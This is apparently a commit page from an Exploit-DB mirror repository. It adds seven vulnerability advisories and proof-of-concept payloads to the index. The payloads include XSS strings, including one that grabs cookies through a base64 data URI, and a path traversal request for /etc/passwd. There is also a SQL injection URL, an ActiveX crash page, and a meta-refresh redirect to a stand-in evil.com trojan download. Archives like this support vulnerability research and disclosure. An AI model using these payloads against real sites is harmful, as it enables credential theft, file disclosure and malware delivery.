bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-24

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2015-07-24 05:02:14 +00:00
parent 3b462fe869
commit d6eaf56290
8 changed files with 67 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -5245,7 +5245,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (perl)",2008-05-15,"Markus Mueller",multiple,remote,22
5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",multiple,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,multiple,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -13296,7 +13296,7 @@ id,file,description,date,author,platform,type,port
15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass) (0day)",2010-11-24,noobpwnftw,windows,local,0
15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0
15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
@ -15762,7 +15762,7 @@ id,file,description,date,author,platform,type,port
18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0
18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
18156,platforms/php/webapps/18156.txt,"php video script SQL Injection Vulnerability",2011-11-25,longrifle0x,php,webapps,0
18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0
18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0
@ -33999,3 +33999,10 @@ id,file,description,date,author,platform,type,port
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Reza Espargham",windows,remote,0
37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
37673,platforms/windows/remote/37673.html,"Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,remote,0
37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability",2012-08-24,"Yakir Wizman",php,webapps,0
37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
37677,platforms/php/webapps/37677.txt,"Wordpress Finder 'order' Parameter Cross Site Scripting Vulnerability",2012-08-25,Crim3R,php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/37676.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55216/info
Power-eCommerce is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com//Questions.asp?id="><script>alert(0);</script>
http://www.example.com/search.asp?7="><script>alert(0);</script>&Search=Search

8
platforms/multiple/remote/37671.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/55194/info
Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evilanother.com%2fimages%2fcross_site.jpg>
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>

9
platforms/php/webapps/37672.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55199/info
JW Player is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
JW Player 5.10.2295 and prior versions are also vulnerable.
http://www.example.com/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

7
platforms/php/webapps/37674.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55205/info
PHP Web Scripts Text Exchange Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00

7
platforms/php/webapps/37675.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55212/info
The Komento component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
www.example.com/component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection]

7
platforms/php/webapps/37677.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55217/info
The Finder plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

9
platforms/windows/remote/37673.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55202/info
Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.
An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>